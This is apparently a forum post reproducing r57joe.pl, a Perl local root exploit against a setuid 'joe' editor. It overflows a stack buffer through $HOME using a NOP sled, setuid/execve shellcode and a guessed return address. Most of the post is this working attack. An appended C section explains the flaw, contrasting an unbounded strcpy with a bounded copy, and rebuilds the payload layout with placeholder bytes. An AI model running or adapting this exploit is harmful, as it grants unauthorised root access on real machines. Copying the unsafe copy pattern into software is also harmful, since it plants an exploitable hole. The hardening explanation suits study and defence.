mario23

linux JOE local exploit

#!/usr/bin/perl
#
#  __________               ___ ___  
#  \______   \__ __  ______/   |   \ 
#   |       _/  |  \/  ___/    _    \
#   |    |   \  |  /\___ \\    |    /
#   |____|_  /____//____  >\___|_  / 
#          \/           \/       \/  
#
# r57joe.pl
# Linux "joe" local exploit
# by 1dt.w0lf // RusH security team
#
# usage: ./joe.pl [offset]
# by default offset = -1000 : tested on ASPlinux 9.0
#
# The payload travels in $HOME: a NOP sled, the shellcode, then 39 copies of
# the return address, 1056 bytes in all. The setuid joe copies $HOME into a
# fixed-size stack buffer, so the saved return address is overwritten with
# $ret + $offset, which has to land somewhere in the sled.

use strict;
use warnings;

my $len    = 1056;          # total payload length
my $ret    = 0xbfffffb1;    # guessed stack address of the sled (ASPLinux 9.0)
my $offset = -1000;         # default adjustment applied to $ret
my $nop    = "\x90";

# proof of concept shellcode (Linux/x86, 63 bytes):
#   setuid(0); setgid(0); execve("/tmp/sh", ...)
# so /tmp/sh (e.g. a copy of /bin/sh) must exist before running the exploit.
my $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .              # setuid(0)
                "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .              # setgid(0)
                "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" .
                "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" .
                "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" .
                "\xff\xff\x01\x2f\x74\x6d\x70\x2f\x73\x68\x01";    # execve "\x01/tmp/sh\x01"

if (@ARGV != 1) {
    print "-----------------------------\n";
    print "*** joe.pl\n";
    print "*** linux joe local exploit\n";
    print "*** usage: ./joe.pl [offset]\n";
    print "*** offset -1000 : tested on ASPLinux 9.0\n";
    print "-----------------------------\n";
    exit;
}

$offset = $ARGV[0];

if (! -u "/usr/bin/joe") {
    print "joe is not suid =(((\n";
    exit;
}

# NOP sled: everything that is not shellcode or return addresses
my $buffer = $nop x ($len - length($shellcode) - 156);
$buffer .= $shellcode;

# return address, little-endian (pack 'l' on x86); the address must contain
# no 0x00 byte or the environment string is cut short. chomp only matters
# if the low byte happens to be 0x0a.
my $pack_ret = pack('l', ($ret + $offset));
chomp($pack_ret);

# 156 bytes = 39 copies of the return address
for (my $i = 0; $i < 156; $i += 4) {
    $buffer .= $pack_ret;
}

print "-----------------------------\n";
print "*** joe local exploit by r57\n";
print "-----------------------------\n";
print "OFFSET : $offset\n";
print "-----------------------------\n";

# deliver the payload through the environment and start the suid binary
local $ENV{'HOME'} = $buffer;
exec("/usr/bin/joe");

# EOF
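Added example, not part of the post above and not joe's own code: the bug class r57joe.pl targets, a setuid program copying an attacker-controlled environment variable ($HOME) into a fixed-size stack buffer, shown beside a bounded version that fails closed, plus a builder that reproduces the script's payload layout (NOP sled, shellcode slot, 39 copies of the little-endian return address) so its arithmetic can be checked without touching a suid binary. The 1024-byte buffer, the "/.joerc" suffix and the 0xcc placeholder bytes standing in for the shellcode are assumptions for illustration.

```c
/*
 * Added example, not joe's code and not from the original post.
 * RCBUF and the "/.joerc" suffix are assumptions for illustration; the
 * payload builder uses 0xcc placeholder bytes where the script has shellcode.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RCBUF 1024           /* assumed fixed buffer size */
#define RET_BYTES 156        /* from the script: 39 x 4-byte return address */
#define SHELLCODE_LEN 63     /* length of the script's shellcode */

/* VULNERABLE pattern: no bound on $HOME. A 1056-byte HOME overruns rc and
 * whatever sits above it on the stack, including the saved return address.
 * Kept for contrast only; never call it with untrusted input. */
static void rc_path_unsafe(const char *home, char *rc)
{
    strcpy(rc, home);
    strcat(rc, "/.joerc");
}

/* HARDENED: check the length first and fail closed. Returns 0 on success,
 * -1 if home is missing or the result would not fit in rcsz bytes. */
static int rc_path_safe(const char *home, char *rc, size_t rcsz)
{
    const char suffix[] = "/.joerc";
    if (home == NULL || rc == NULL)
        return -1;
    if (strlen(home) + sizeof suffix > rcsz)   /* sizeof counts the NUL */
        return -1;
    int n = snprintf(rc, rcsz, "%s%s", home, suffix);
    return (n < 0 || (size_t)n >= rcsz) ? -1 : 0;
}

/* Little-endian bytes of ret + offset, what the script's pack('l', ...) yields.
 * For an environment payload none of the four bytes may be 0x00. */
static void pack_ret(uint32_t ret, int32_t offset, unsigned char out[4])
{
    uint32_t v = ret + (uint32_t)offset;
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* Constructed stand-in for the script's $buffer: NOP sled, SHELLCODE_LEN
 * placeholder bytes, then RET_BYTES of repeated return address. Returns a
 * malloc'd NUL-terminated string of exactly len bytes, or NULL if len is
 * too small for the layout. */
static char *make_hostile_home(size_t len, uint32_t ret, int32_t offset)
{
    if (len < SHELLCODE_LEN + RET_BYTES)
        return NULL;
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return NULL;
    size_t nops = len - SHELLCODE_LEN - RET_BYTES;   /* 837 for len 1056 */
    memset(buf, 0x90, nops);
    memset(buf + nops, 0xcc, SHELLCODE_LEN);
    unsigned char r[4];
    pack_ret(ret, offset, r);
    for (size_t i = nops + SHELLCODE_LEN; i + 4 <= len; i += 4)
        memcpy(buf + i, r, 4);
    buf[len] = '\0';
    return buf;
}

int main(void)
{
    char rc[RCBUF];
    unsigned char r[4];

    pack_ret(0xbfffffb1u, -1000, r);
    printf("ret+offset bytes: %02x %02x %02x %02x\n", r[0], r[1], r[2], r[3]);

    rc_path_unsafe("/home/user", rc);      /* benign input: both variants agree */
    printf("unsafe, normal HOME -> %s\n", rc);
    if (rc_path_safe("/home/user", rc, sizeof rc) == 0)
        printf("safe,   normal HOME -> %s\n", rc);

    char *hostile = make_hostile_home(1056, 0xbfffffb1u, -1000);
    if (hostile != NULL) {
        printf("hostile HOME is %zu bytes, bounded copy %s\n", strlen(hostile),
               rc_path_safe(hostile, rc, sizeof rc) == 0 ? "accepted" : "rejected");
        /* rc_path_unsafe(hostile, rc) would smash the stack here; not called. */
        free(hostile);
    }
    return 0;
}
```

The checked value 0xbffffbc9 (c9 fb ff bf) contains no zero byte, which is the constraint any address delivered through the environment has to meet; the hardened copy rejects the 1056-byte value outright instead of relying on the stack layout.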
